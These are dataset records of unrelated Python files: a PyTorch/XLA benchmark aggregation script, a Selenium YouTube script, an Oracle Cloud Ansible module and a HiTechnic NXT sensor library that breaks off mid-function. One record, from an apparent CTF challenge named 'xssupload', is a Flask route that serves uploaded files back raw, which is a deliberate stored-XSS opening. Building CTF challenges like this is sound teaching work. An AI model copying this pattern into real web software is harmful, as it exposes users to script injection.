csv.Sniffer().has_header(check_header_file.read(1024))\n except csv.Error:\n logger.error('Cannot read CSV in %s, skipping.', filename)\n return\n if not has_header:\n logger.error('Cannot interpret %s: missing headers.', filename)\n return\n fields = (\n 'model_name',\n 'accelerator_model',\n 'dynamo',\n 'test',\n 'batch_size',\n 'median_total_time',\n )\n with open(filename) as read_file:\n reader = csv.reader(read_file)\n headers = next(reader)\n if headers[0] != 'timestamp':\n logger.error('Missing timestamp in CSV in %s, skipping.', filename)\n return\n field2index = {}\n for i, header in enumerate(headers):\n for field in fields:\n if field == header:\n field2index[field] = i\n for row in reader:\n timestamp = row[0]\n model_name = row[field2index['model_name']]\n if skip_model(args, model_name):\n continue\n accelerator_model = clean_up_accelerator_model(\n row[field2index['accelerator_model']])\n if accelerator_model != args.accelerator:\n continue\n dynamo = row[field2index['dynamo']]\n test = row[field2index['test']]\n if test != test_to_csv_field_name[args.test]['test']:\n continue\n batch_size = row[field2index['batch_size']]\n median_total_time = row[field2index['median_total_time']]\n if timestamp not in results_map:\n results_map[timestamp] = {}\n if dynamo not in results_map[timestamp]:\n results_map[timestamp][dynamo] = {}\n if (model_name not in results_map[timestamp][dynamo]):\n results_map[timestamp][dynamo][model_name] = {}\n if (batch_size not in results_map[timestamp][dynamo][model_name]):\n results_map[timestamp][dynamo][model_name][batch_size] = {}\n results_map[timestamp][dynamo][model_name][batch_size] = median_total_time\n\n\ndef summarize_speedups(acc_map: Dict[str, Any], label: str):\n if label not in acc_map:\n return\n acc_map[f'{label}:gmean'] = gmean(acc_map[label])\n for p in (5, 50, 95):\n percentile = float(np.percentile(acc_map[label], p))\n acc_map[f'{label}:p{p}'] = percentile\n\n\n# The speedup values are stored in acc_map[out_label]; the corresponding\n# model names are stored in acc_map[f'{out_label}:model_name'].\ndef compute_speedups(acc_map: Dict[str, Any], baseline: Dict[str, Any],\n out_label: str, in_label: str):\n model_label = f'{out_label}:model_name'\n if in_label not in acc_map:\n return\n for model_name, v in acc_map[in_label].items():\n if model_name not in baseline:\n continue\n speedups = []\n # If we are running several batch sizes, keep the geomean of their speedups.\n for batch_size in v:\n experiment_time = v[batch_size]\n baseline_time = baseline[model_name].get(batch_size, None)\n if not experiment_time or not baseline_time:\n continue\n speedups.append(float(baseline_time) / float(experiment_time))\n if speedups:\n if out_label not in acc_map:\n acc_map[out_label] = []\n acc_map[out_label].append(gmean(speedups))\n if model_label not in acc_map:\n acc_map[model_label] = []\n acc_map[model_label].append(model_name)\n summarize_speedups(acc_map, out_label)\n\n\n# A benchmark's baseline is the oldest Inductor perf number we have for it.\n# This way we can track both Pytorch/XLA and Inductor perf improvements over\n# time.\ndef compute_baseline(results_map: Dict[str, Any]) -> Dict[str, Any]:\n baseline = {}\n for ts in sorted(list(results_map.keys())):\n if 'inductor' not in results_map[ts]:\n continue\n for model_name in results_map[ts]['inductor']:\n if model_name not in baseline:\n baseline[model_name] = {}\n for batch_size in results_map[ts]['inductor'][model_name]:\n if batch_size not in baseline[model_name]:\n baseline[model_name][batch_size] = results_map[ts]['inductor'][\n model_name][batch_size]\n return baseline\n\n\ndef process_results(args, results_map: Dict[str, Any]):\n baseline = compute_baseline(results_map)\n for timestamp in results_map:\n acc_map = results_map[timestamp]\n\n name2field = test_to_csv_field_name[args.test]\n compute_speedups(acc_map, baseline, 'xla:speedups', name2field['xla_label'])\n compute_speedups(acc_map, baseline, 'inductor:speedups',\n name2field['inductor_label'])\n\n\ndef maketitle(args, title: str):\n if args.title:\n title += f'\\n{args.title}'\n return title\n\n\ndef pr_latest(results_map: Dict[str, Any], args, timestamps: List[str]):\n prefixes = ('inductor', 'xla')\n speedups = [[], []]\n model_names = [[], []]\n speedup_timestamps = [[], []]\n\n for i, pfx in enumerate(prefixes):\n label = f'{pfx}:speedups'\n model_label = f'{label}:model_name'\n for timestamp in reversed(timestamps):\n acc_map = results_map[timestamp]\n if label in acc_map:\n (speedups[i], model_names[i]) = map(\n list, zip(*sorted(zip(acc_map[label], acc_map[model_label]))))\n speedup_timestamps[i] = timestamp\n break\n if not speedups[0] or not speedups[1]:\n logger.warning(f'cannot find data for accelerator {args.accelerator}')\n return\n\n if args.format == 'csv':\n print('# WorkloadNumber,Speedup(Inductor/Oldest Inductor),'\n 'ModelName(Inductor),Speedup(PytorchXLA/Oldest Inductor),'\n 'ModelName(PytorchXLA)')\n # Use zip_longest because the latest timestamp might not have complete\n # results for all benchmarks.\n for i, z in enumerate(itertools.zip_longest(speedups[0], speedups[1])):\n print(','.join(\n map(str, [\n i, z[0], model_names[0][i] if z[0] else None, z[1],\n model_names[1][i] if z[1] else None\n ])))\n else:\n plt.axhline(y=1.0, color='lightgray')\n plt.plot(speedups[0], label='Inductor', marker='^')\n plt.plot(speedups[1], label='PytorchXLA', marker='o')\n plt.legend()\n dates = date.fromtimestamp(float(speedup_timestamps[0]))\n if speedup_timestamps[0] != speedup_timestamps[1]:\n dates = f'{dates} (Inductor)'\n dates += ', {date.fromtimestamp(float(dates[1]))} (PytorchXLA)'\n plt.title(\n maketitle(args,\n f'Speedup over Oldest Benchmarked Inductor as of {dates}'))\n plt.xlabel('Workload Number')\n plt.ylabel(f'Speedup')\n plt.savefig(sys.stdout.buffer)\n\n\ndef pr_histogram(results_map: Dict[str, Any], args, timestamps: List[str]):\n percentiles = [f'p{p}' for p in (95, 50, 5)]\n prefixes = ('inductor', 'xla')\n labels = [f'{pfx}:speedups:{p}' for pfx in prefixes for p in percentiles]\n titles = [\n l.replace(':speedups:',\n ' ').replace('xla',\n 'PytorchXLA').replace('inductor', 'Inductor')\n for l in labels\n ]\n x = []\n y = [[] for i in range(len(labels))]\n for timestamp in timestamps:\n if labels[0] in results_map[timestamp]:\n for label in labels:\n assert label in results_map[timestamp]\n x.append(date.fromtimestamp(float(timestamp)))\n for i, label in enumerate(labels):\n y[i].append(results_map[timestamp][label])\n if args.format == 'csv':\n titles = ['# Datetime'] + titles\n print(','.join(titles))\n for i, datetime in enumerate(x):\n print(','.join([str(datetime)] +\n [str(y[j][i]) for j in range(len(labels))]))\n else:\n fig, ax = plt.subplots()\n ax.axhline(y=1.0, color='lightgray')\n markers = ('^', 'o')\n linestyles = ('solid', 'dotted')\n for i, label in enumerate(labels):\n style = int(i / len(percentiles))\n ax.plot(\n x,\n y[i],\n label=titles[i],\n marker=markers[style],\n linestyle=linestyles[style])\n ax.xaxis.set_major_formatter(\n mdates.ConciseDateFormatter(ax.xaxis.get_major_locator()))\n plt.legend()\n plt.xlabel(\"Date\")\n plt.ylabel(\"Geomean Speedup\")\n plt.title(\n maketitle(args,\n 'Histogram of Speedup over Oldest Benchmarked Inductor'))\n plt.savefig(sys.stdout.buffer)\n\n\ndef pr_gmean(results_map: Dict[str, Any], args, timestamps: List[str]):\n label = f'speedups:gmean'\n x = []\n y0 = []\n y1 = []\n for timestamp in timestamps:\n if 'inductor:speedups:gmean' not in results_map[\n timestamp] or 'xla:speedups:gmean' not in results_map[timestamp]:\n continue\n x.append(date.fromtimestamp(float(timestamp)))\n y0.append(results_map[timestamp]['inductor:speedups:gmean'])\n y1.append(results_map[timestamp]['xla:speedups:gmean'])\n if args.format == 'csv':\n print(\n '# Datetime,Speedup(Inductor/Oldest Inductor),Speedup(PytorchXLA/Oldest Inductor)'\n )\n for a, b, c in zip(x, y0, y1):\n print(','.join(map(str, [a, b, c])))\n else:\n fig, ax = plt.subplots()\n ax.axhline(y=1.0, color='lightgray')\n ax.plot(x, y0, marker='^', label='Inductor')\n ax.plot(x, y1, marker='o', label='PytorchXLA')\n ax.xaxis.set_major_formatter(\n mdates.ConciseDateFormatter(ax.xaxis.get_major_locator()))\n plt.legend()\n plt.xlabel(\"Date\")\n plt.ylabel(\"Geomean Speedup\")\n plt.title(maketitle(args, 'Speedup over Oldest Benchmarked Inductor'))\n plt.savefig(sys.stdout.buffer)\n\n\ndef pr_results(results_map: Dict[str, Any], args):\n timestamps = list(results_map.keys())\n timestamps.sort()\n\n if args.format == 'png' and not has_matplotlib:\n sys.exit('Fatal: cannot find matplotlib packages needed for PNG output.')\n\n if args.report == 'latest':\n return pr_latest(results_map, args, timestamps)\n elif args.report == 'histogram':\n return pr_histogram(results_map, args, timestamps)\n elif args.report == 'speedup':\n return pr_gmean(results_map, args, timestamps)\n else:\n sys.exit('unreachable')\n\n\ndef parse_args(args=None):\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--accelerator',\n default='v100',\n choices=['a100', 'v100', 'a6000'],\n help='Accelerator.')\n parser.add_argument(\n \"--exclude\",\n \"-x\",\n action=\"append\",\n default=[],\n help=\"filter out benchmarks with regexp\")\n parser.add_argument(\n \"--exclude-by-tier\",\n type=int,\n action=\"append\",\n default=[],\n help=\"filter out benchmarks by predefined tier 1-3\",\n )\n parser.add_argument(\n \"--filter\",\n \"-k\",\n action=\"append\",\n default=[],\n help=\"filter benchmarks with regexp\")\n parser.add_argument(\n \"--filter-by-tier\",\n type=int,\n action=\"append\",\n default=[],\n help=\"filter benchmarks by predefined tier 1-3\",\n )\n parser.add_argument(\n \"--format\", default='csv', choices=['csv', 'png'], help='Output format')\n parser.add_argument(\n '--input-dirname', '-i', required=True, type=str, help='Input directory.')\n parser.add_argument(\n '--report',\n default='speedup',\n choices=['latest', 'histogram', 'speedup'],\n help='What report to generate.')\n parser.add_argument(\n '--test',\n default='inference',\n choices=['inference', 'training'],\n help='Test mode.')\n parser.add_argument('--title', type=str, help=\"Plot title.\")\n args = parser.parse_args(args)\n\n tiers.append_filter_by_tier(args.filter, args.filter_by_tier)\n tiers.append_filter_by_tier(args.exclude, args.exclude_by_tier)\n args.filter = args.filter or [r\".\"]\n args.exclude = args.exclude or [r\"^$\"]\n\n return args\n\n\ndef main():\n args = parse_args()\n filenames = find_files(args.input_dirname)\n results_map = {}\n\n # Some CSV files have lots of errors from execution; expand CSV's size limit.\n csv.field_size_limit(1024 * 1024)\n\n for filename in filenames:\n process_file(args, results_map, filename)\n process_results(args, results_map)\n if not results_map:\n sys.exit('no results found')\n pr_results(results_map, args)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mrnikwaws/torch_xla","sub_path":"benchmarks/aggregate.py","file_name":"aggregate.py","file_ext":"py","file_size_in_byte":13472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"35919561286","text":"from flask import Blueprint, render_template, Response\nimport storage\n\nblueprint = Blueprint('getfiles', __name__)\n\n\n@blueprint.get(\"/file/\")\ndef get_file(file_id):\n value = storage.lookup_item(file_id)\n if value is None:\n return render_template(\"404.html\"), 404\n response = Response(value)\n return response\n","repo_name":"uhctf/uhctf2023","sub_path":"challenges/xssupload/webserver/getfiles.py","file_name":"getfiles.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"8622592676","text":"\r\n\r\nimport time\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\n\r\ndriver = webdriver.Chrome()\r\n\r\ndriver.maximize_window() #maximize the window\r\ndriver.get(\"https://www.youtube.com/\") #YouTube link\r\ntime.sleep(5)\r\ndriver.find_element(By.NAME, \"search_query\").send_keys(\"Yaro Yaro\") #Song name which you need to mention\r\ndriver.find_element(By.ID, \"search-icon-legacy\").click() #By clicking on search it will direct you to the song name you mentioned\r\ntime.sleep(5)\r\ndriver.find_element(By.CLASS_NAME, \"style-scope ytd-video-renderer\").click() #As you mentioned the song name this will click the first song which is coming infront row\r\nwait = WebDriverWait(driver,10)\r\nwhile True:\r\n try:\r\n for i in range(3):\r\n wait.until(EC.presence_of_element_located((By.CLASS_NAME,\"ytp\")))\r\n break\r\n except:\r\n pass\r\n","repo_name":"RathishRavindran/SeleniumSnippet","sub_path":"Youtube.py","file_name":"Youtube.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42514768719","text":"from __future__ import absolute_import, division, print_function\n\n__metaclass__ = type\n\nANSIBLE_METADATA = {\n \"metadata_version\": \"1.1\",\n \"status\": [\"preview\"],\n \"supported_by\": \"community\",\n}\n\nDOCUMENTATION = \"\"\"\n---\nmodule: oci_data_flow_statement\nshort_description: Manage a Statement resource in Oracle Cloud Infrastructure\ndescription:\n - This module allows the user to create and delete a Statement resource in Oracle Cloud Infrastructure\n - For I(state=present), executes a statement for a Session run.\nversion_added: \"2.9.0\"\nauthor: Oracle (@oracle)\noptions:\n code:\n description:\n - \"The statement code to execute.\n Example: `println(sc.version)`\"\n - Required for create using I(state=present).\n type: str\n run_id:\n description:\n - The unique ID for the run\n type: str\n required: true\n statement_id:\n description:\n - The unique ID for the statement.\n - Required for delete using I(state=absent).\n type: str\n aliases: [\"id\"]\n state:\n description:\n - The state of the Statement.\n - Use I(state=present) to create a Statement.\n - Use I(state=absent) to delete a Statement.\n type: str\n required: false\n default: 'present'\n choices: [\"present\", \"absent\"]\nextends_documentation_fragment: [ oracle.oci.oracle, oracle.oci.oracle_creatable_resource, oracle.oci.oracle_wait_options ]\n\"\"\"\n\nEXAMPLES = \"\"\"\n- name: Create statement\n oci_data_flow_statement:\n # required\n code: code_example\n run_id: \"ocid1.run.oc1..xxxxxxEXAMPLExxxxxx\"\n\n- name: Delete statement\n oci_data_flow_statement:\n # required\n run_id: \"ocid1.run.oc1..xxxxxxEXAMPLExxxxxx\"\n statement_id: \"ocid1.statement.oc1..xxxxxxEXAMPLExxxxxx\"\n state: absent\n\n\"\"\"\n\nRETURN = \"\"\"\nstatement:\n description:\n - Details of the Statement resource acted upon by the current operation\n returned: on success\n type: complex\n contains:\n id:\n description:\n - The statement ID.\n returned: on success\n type: int\n sample: 56\n code:\n description:\n - \"The statement code to execute.\n Example: `println(sc.version)`\"\n returned: on success\n type: str\n sample: code_example\n lifecycle_state:\n description:\n - The current state of this statement.\n returned: on success\n type: str\n sample: ACCEPTED\n output:\n description:\n - \"\"\n returned: on success\n type: complex\n contains:\n data:\n description:\n - \"\"\n returned: on success\n type: complex\n contains:\n type:\n description:\n - The type of the `StatementOutputData` like `TEXT_PLAIN`, `TEXT_HTML` or `IMAGE_PNG`.\n returned: on success\n type: str\n sample: TEXT_PLAIN\n value:\n description:\n - The statement code execution output in png format.\n returned: on success\n type: str\n sample: \"null\"\n\n status:\n description:\n - Status of the statement output.\n returned: on success\n type: str\n sample: OK\n error_name:\n description:\n - The name of the error in the statement output.\n returned: on success\n type: str\n sample: error_name_example\n error_value:\n description:\n - The value of the error in the statement output.\n returned: on success\n type: str\n sample: error_value_example\n traceback:\n description:\n - The traceback of the statement output.\n returned: on success\n type: list\n sample: []\n progress:\n description:\n - The execution progress.\n returned: on success\n type: float\n sample: 1.2\n run_id:\n description:\n - The ID of a run.\n returned: on success\n type: str\n sample: \"ocid1.run.oc1..xxxxxxEXAMPLExxxxxx\"\n time_created:\n description:\n - \"The date and time the resource was created, expressed in L(RFC 3339,https://tools.ietf.org/html/rfc3339) timestamp format.\n Example: `2018-04-03T21:10:29.600Z`\"\n returned: on success\n type: str\n sample: \"2013-10-20T19:20:30+01:00\"\n time_completed:\n description:\n - \"The date and time a statement execution was completed, expressed in L(RFC 3339,https://tools.ietf.org/html/rfc3339) timestamp format.\n Example: `2022-05-31T21:10:29.600Z`\"\n returned: on success\n type: str\n sample: \"2013-10-20T19:20:30+01:00\"\n sample: {\n \"id\": 56,\n \"code\": \"code_example\",\n \"lifecycle_state\": \"ACCEPTED\",\n \"output\": {\n \"data\": {\n \"type\": \"TEXT_PLAIN\",\n \"value\": null\n },\n \"status\": \"OK\",\n \"error_name\": \"error_name_example\",\n \"error_value\": \"error_value_example\",\n \"traceback\": []\n },\n \"progress\": 1.2,\n \"run_id\": \"ocid1.run.oc1..xxxxxxEXAMPLExxxxxx\",\n \"time_created\": \"2013-10-20T19:20:30+01:00\",\n \"time_completed\": \"2013-10-20T19:20:30+01:00\"\n }\n\"\"\"\n\nfrom ansible_collections.oracle.oci.plugins.module_utils import (\n oci_common_utils,\n oci_wait_utils,\n)\nfrom ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (\n OCIResourceHelperBase,\n get_custom_class,\n OCIAnsibleModule,\n)\n\ntry:\n from oci.data_flow import DataFlowClient\n from oci.data_flow.models import CreateStatementDetails\n\n HAS_OCI_PY_SDK = True\nexcept ImportError:\n HAS_OCI_PY_SDK = False\n\n\nclass DataFlowStatementHelperGen(OCIResourceHelperBase):\n \"\"\"Supported operations: create, get, list and delete\"\"\"\n\n def get_possible_entity_types(self):\n return super(DataFlowStatementHelperGen, self).get_possible_entity_types() + [\n \"dataflowrun\",\n \"dataflowruns\",\n \"dataFlowdataflowrun\",\n \"dataFlowdataflowruns\",\n \"dataflowrunresource\",\n \"dataflowrunsresource\",\n \"statement\",\n \"statements\",\n \"dataFlowstatement\",\n \"dataFlowstatements\",\n \"statementresource\",\n \"statementsresource\",\n \"dataflow\",\n ]\n\n def get_module_resource_id_param(self):\n return \"statement_id\"\n\n def get_module_resource_id(self):\n return self.module.params.get(\"statement_id\")\n\n def get_get_fn(self):\n return self.client.get_statement\n\n def get_get_model_from_summary_model(self, summary_model):\n return oci_common_utils.call_with_backoff(\n self.client.get_statement,\n statement_id=summary_model.id,\n run_id=self.module.params.get(\"run_id\"),\n ).data\n\n def get_resource(self):\n return oci_common_utils.call_with_backoff(\n self.client.get_statement,\n run_id=self.module.params.get(\"run_id\"),\n statement_id=self.module.params.get(\"statement_id\"),\n )\n\n def get_required_kwargs_for_list(self):\n required_list_method_params = [\n \"run_id\",\n ]\n\n return dict(\n (param, self.module.params[param]) for param in required_list_method_params\n )\n\n def get_optional_kwargs_for_list(self):\n return dict()\n\n def list_resources(self):\n\n required_kwargs = self.get_required_kwargs_for_list()\n optional_kwargs = self.get_optional_kwargs_for_list()\n kwargs = oci_common_utils.merge_dicts(required_kwargs, optional_kwargs)\n return oci_common_utils.list_all_resources(\n self.client.list_statements, **kwargs\n )\n\n def get_create_model_class(self):\n return CreateStatementDetails\n\n def create_resource(self):\n create_details = self.get_create_model()\n return oci_wait_utils.call_and_wait(\n call_fn=self.client.create_statement,\n call_fn_args=(),\n call_fn_kwargs=dict(\n create_statement_details=create_details,\n run_id=self.module.params.get(\"run_id\"),\n ),\n waiter_type=oci_wait_utils.LIFECYCLE_STATE_WAITER_KEY,\n operation=oci_common_utils.CREATE_OPERATION_KEY,\n waiter_client=self.get_waiter_client(),\n resource_helper=self,\n wait_for_states=self.get_wait_for_states_for_operation(\n oci_common_utils.CREATE_OPERATION_KEY,\n ),\n )\n\n def delete_resource(self):\n return oci_wait_utils.call_and_wait(\n call_fn=self.client.delete_statement,\n call_fn_args=(),\n call_fn_kwargs=dict(\n run_id=self.module.params.get(\"run_id\"),\n statement_id=self.module.params.get(\"statement_id\"),\n ),\n waiter_type=oci_wait_utils.NONE_WAITER_KEY,\n operation=oci_common_utils.DELETE_OPERATION_KEY,\n waiter_client=self.get_waiter_client(),\n resource_helper=self,\n wait_for_states=self.get_wait_for_states_for_operation(\n oci_common_utils.DELETE_OPERATION_KEY,\n ),\n )\n\n\nDataFlowStatementHelperCustom = get_custom_class(\"DataFlowStatementHelperCustom\")\n\n\nclass ResourceHelper(DataFlowStatementHelperCustom, DataFlowStatementHelperGen):\n pass\n\n\ndef main():\n module_args = oci_common_utils.get_common_arg_spec(\n supports_create=True, supports_wait=True\n )\n module_args.update(\n dict(\n code=dict(type=\"str\"),\n run_id=dict(type=\"str\", required=True),\n statement_id=dict(aliases=[\"id\"], type=\"str\"),\n state=dict(type=\"str\", default=\"present\", choices=[\"present\", \"absent\"]),\n )\n )\n\n module = OCIAnsibleModule(argument_spec=module_args, supports_check_mode=True)\n\n if not HAS_OCI_PY_SDK:\n module.fail_json(msg=\"oci python sdk required for this module.\")\n\n resource_helper = ResourceHelper(\n module=module,\n resource_type=\"statement\",\n service_client_class=DataFlowClient,\n namespace=\"data_flow\",\n )\n\n result = dict(changed=False)\n\n if resource_helper.is_delete():\n result = resource_helper.delete()\n elif resource_helper.is_create():\n result = resource_helper.create()\n\n module.exit_json(**result)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"oracle/oci-ansible-collection","sub_path":"plugins/modules/oci_data_flow_statement.py","file_name":"oci_data_flow_statement.py","file_ext":"py","file_size_in_byte":11377,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"78"} +{"seq_id":"38823300686","text":"from .common import *\nfrom .digital import BaseDigitalSensor\nfrom .analog import BaseAnalogSensor\n\n\nclass Compass(BaseDigitalSensor):\n \"\"\"Hitechnic compass sensor.\"\"\"\n I2C_ADDRESS = BaseDigitalSensor.I2C_ADDRESS.copy()\n I2C_ADDRESS.update({'mode': (0x41, 'B'),\n 'heading': (0x42, 'B'),\n 'adder' : (0x43, 'B'),\n })\n \n class Modes:\n MEASUREMENT = 0x00\n CALIBRATION = 0x43\n CALIBRATION_FAILED = 0x02\n \n def get_heading(self):\n \"\"\"Returns heading from North in degrees.\"\"\"\n\n two_degree_heading = self.read_value('heading')[0]\n adder = self.read_value('adder')[0]\n heading = two_degree_heading * 2 + adder\n\n return heading\n \n get_sample = get_heading\n\n def get_relative_heading(self,target=0):\n rheading = self.get_sample()-target\n if rheading > 180:\n rheading -= 360\n elif rheading < -180:\n rheading += 360\n return rheading\t\n \n def is_in_range(self,minval,maxval):\n \"\"\"This deserves a little explanation:\nif max > min, it's straightforward, but\nif min > max, it switches the values of max and min\nand returns true if heading is NOT between the new max and min\n \"\"\"\n if minval > maxval:\n (maxval,minval) = (minval,maxval)\n inverted = True\n else:\n inverted = False\n heading = self.get_sample()\n in_range = (heading > minval) and (heading < maxval)\n #an xor handles the reversal\n #a faster, more compact way of saying\n #if !reversed return in_range\n #if reversed return !in_range\n return bool(inverted) ^ bool(in_range) \n\n def get_mode(self):\n return self.read_value('mode')[0]\n \n def set_mode(self, mode):\n if mode != self.Modes.MEASUREMENT and \\\n mode != self.Modes.CALIBRATION:\n raise ValueError('Invalid mode specified: ' + str(mode))\n self.write_value('mode', (mode, ))\n \nCompass.add_compatible_sensor(None, 'HiTechnc', 'Compass ') #Tested with version '\\xfdV1.23 '\nCompass.add_compatible_sensor(None, 'HITECHNC', 'Compass ') #Tested with version '\\xfdV2.1 '\n\n\nclass Accelerometer(BaseDigitalSensor):\n 'Object for Accelerometer sensors. Thanks to Paulo Vieira.'\n I2C_ADDRESS = BaseDigitalSensor.I2C_ADDRESS.copy()\n I2C_ADDRESS.update({'x_axis_high': (0x42, 'b'),\n 'y_axis_high': (0x43, 'b'),\n 'z_axis_high': (0x44, 'b'),\n 'xyz_short': (0x42, '3b'),\n 'all_data': (0x42, '3b3B')\n })\n \n class Acceleration:\n def __init__(self, x, y, z):\n self.x, self.y, self.z = x, y, z\n \n def __init__(self, brick, port, check_compatible=True):\n super(Accelerometer, self).__init__(brick, port, check_compatible)\n\n def get_acceleration(self):\n \"\"\"Returns the acceleration along x, y, z axes. Units are unknown to me.\n \"\"\"\n xh, yh, zh, xl, yl, zl = self.read_value('all_data')\n x = xh << 2 + xl\n y = yh << 2 + yl\n z = zh << 2 + yl\n return self.Acceleration(x, y, z)\n \n get_sample = get_acceleration\n\nAccelerometer.add_compatible_sensor(None, 'HiTechnc', 'Accel. ')\nAccelerometer.add_compatible_sensor(None, 'HITECHNC', 'Accel. ') #Tested with version '\\xfdV1.1 '\n\n\nclass IRReceiver(BaseDigitalSensor):\n \"\"\"Object for HiTechnic IRReceiver sensors for use with LEGO Power Functions IR\nRemotes. Coded to HiTechnic's specs for the sensor but not tested. Please report\nwhether this worked for you or not!\n \"\"\"\n I2C_ADDRESS = BaseDigitalSensor.I2C_ADDRESS.copy()\n I2C_ADDRESS.update({\n 'm1A': (0x42, 'b'),\n 'm1B': (0x43, 'b'),\n 'm2A': (0x44, 'b'),\n 'm2B': (0x45, 'b'),\n 'm3A': (0x46, 'b'),\n 'm3B': (0x47, 'b'),\n 'm4A': (0x48, 'b'),\n 'm4B': (0x49, 'b'),\n 'all_data': (0x42, '8b')\n })\n\n class SpeedReading:\n def __init__(self, m1A, m1B, m2A, m2B, m3A, m3B, m4A, m4B):\n self.m1A, self.m1B, self.m2A, self.m2B, self.m3A, self.m3B, self.m4A, self.m4B = m1A, m1B, m2A, m2B, m3A, m3B, m4A, m4B\n self.channel_1 = (m1A, m1B)\n self.channel_2 = (m2A, m2B)\n self.channel_3 = (m3A, m3B)\n self.channel_4 = (m4A, m4B)\n \n def __init__(self, brick, port, check_compatible=True):\n super(IRReceiver, self).__init__(brick, port, check_compatible)\n\n def get_speeds(self):\n \"\"\"Returns the motor speeds for motors A and B on channels 1-4.\nValues are -128, -100, -86, -72, -58, -44, -30, -16, 0, 16, 30, 44, 58, 72, 86\nand 100. -128 specifies motor brake mode. Note that no motors are actually\nbeing controlled here!\n \"\"\"\n m1A, m1B, m2A, m2B, m3A, m3B, m4A, m4B = self.read_value('all_data')\n return self.SpeedReading(m1A, m1B, m2A, m2B, m3A, m3B, m4A, m4B)\n \n get_sample = get_speeds\n\nIRReceiver.add_compatible_sensor(None, 'HiTechnc', 'IRRecv ')\nIRReceiver.add_compatible_sensor(None, 'HITECHNC', 'IRRecv ')\n\n\nclass IRSeekerv2(BaseDigitalSensor):\n \"\"\"Object for HiTechnic IRSeeker sensors. Coded to HiTechnic's specs for the sensor\nbut not tested. Please report whether this worked for you or not!\n \"\"\"\n I2C_ADDRESS = BaseDigitalSensor.I2C_ADDRESS.copy()\n I2C_ADDRESS.update({\n 'dspmode': (0x41, 'B'),\n 'DC_direction': (0x42, 'B'),\n 'DC_sensor_1': (0x43, 'B'),\n 'DC_sensor_2': (0x44, 'B'),\n 'DC_sensor_3': (0x45, 'B'),\n 'DC_sensor_4': (0x46, 'B'),\n 'DC_sensor_5': (0x47, 'B'),\n 'DC_sensor_mean': (0x48, 'B'),\n 'all_DC': (0x42, '7B'),\n 'AC_direction': (0x49, 'B'),\n 'AC_sensor_1': (0x4A, 'B'),\n 'AC_sensor_2': (0x4B, 'B'),\n 'AC_sensor_3': (0x4C, 'B'),\n 'AC_sensor_4': (0x4D, 'B'),\n 'AC_sensor_5': (0x4E, 'B'),\n 'all_AC': (0x49, '6B')\n })\n I2C_DEV = 0x10 #different from standard 0x02\n \n class DSPModes:\n #Modes for modulated (AC) data.\n AC_DSP_1200Hz = 0x00\n AC_DSP_600Hz = 0x01\n \n class _data:\n def get_dir_brightness(self, direction):\n \"Gets the brightness of a given direction (1-9).\"\n if direction%2 == 1: #if it's an odd number\n exec(\"val = self.sensor_%d\" % ((direction-1)/2+1))\n else:\n exec(\"val = (self.sensor_%d+self.sensor_%d)/2\" % (direction/2, (direction/2)+1))\n return val\n \n class DCData(_data):\n def __init__(self, direction, sensor_1, sensor_2, sensor_3, sensor_4, sensor_5, sensor_mean):\n self.direction, self.sensor_1, self.sensor_2, self.sensor_3, self.sensor_4, self.sensor_5, self.sensor_mean = direction, sensor_1, sensor_2, sensor_3, sensor_4, sensor_5, sensor_mean\n \n class ACData(_data):\n def __init__(self, direction, sensor_1, sensor_2, sensor_3, sensor_4, sensor_5):\n self.direction, self.sensor_1, self.sensor_2, self.sensor_3, self.sensor_4, self.sensor_5 = direction, sensor_1, sensor_2, sensor_3, sensor_4, sensor_5\n \n \n def __init__(self, brick, port, check_compatible=True):\n super(IRSeekerv2, self).__init__(brick, port, check_compatible)\n\n def get_dc_values(self):\n \"\"\"Returns the unmodulated (DC) values.\n \"\"\"\n direction, sensor_1, sensor_2, sensor_3, sensor_4, sensor_5, sensor_mean = self.read_value('all_DC')\n return self.DCData(direction, sensor_1, sensor_2, sensor_3, sensor_4, sensor_5, sensor_mean)\n \n def get_ac_values(self):\n \"\"\"Returns the modulated (AC) values. 600Hz and 1200Hz modes can be selected\nbetween by using the set_dsp_mode() function.\n \"\"\"\n direction, sensor_1, sensor_2, sensor_3, sensor_4, sensor_5 = self.read_value('all_AC')\n return self.ACData(direction, sensor_1, sensor_2, sensor_3, sensor_4, sensor_5)\n \n def get_dsp_mode(self):\n return self.read_value('dspmode')[0]\n \n def set_dsp_mode(self, mode):\n self.write_value('dspmode', (mode, ))\n \n get_sample = get_ac_values\n\nIRSeekerv2.add_compatible_sensor(None, 'HiTechnc', 'NewIRDir')\nIRSeekerv2.add_compatible_sensor(None, 'HITECHNC', 'NewIRDir')\n\n\nclass EOPD(BaseAnalogSensor):\n \"\"\"Object for HiTechnic Electro-Optical Proximity Detection sensors.\n \"\"\"\n \n # To be divided by processed value.\n _SCALE_CONSTANT = 250\n\n # Maximum distance the sensor can detect.\n _MAX_DISTANCE = 1023\n\n def __init__(self, brick, port):\n super(EOPD, self).__init__(brick, port)\n from math import sqrt\n self.sqrt = sqrt\n\n def set_range_long(self):\n ''' Choose this mode to increase the sensitivity\n of the EOPD sensor by approximately 4x. May\n cause sensor overload.\n '''\n\n self.set_input_mode(Type.LIGHT_ACTIVE, Mode.RAW)\n\n def set_range_short(self):\n ''' Choose this mode to prevent the EOPD sensor from\n being overloaded by white objects.\n '''\n\n self.set_input_mode(Type.LIGHT_INACTIVE, Mode.RAW)\n \n def get_raw_value(self):\n '''Unscaled value read from sensor.'''\n\n return self._MAX_DISTANCE - self.get_input_values().raw_ad_value\n \n def get_processed_value(self):\n '''Derived from the square root of the raw value.'''\n\n return self.sqrt(self.get_raw_value())\n\n def get_scaled_value(self):\n ''' Returns a value that will scale linearly as distance\n from target changes. This is the method that should\n generally be called to get EOPD sensor data.\n '''\n\n try:\n result = 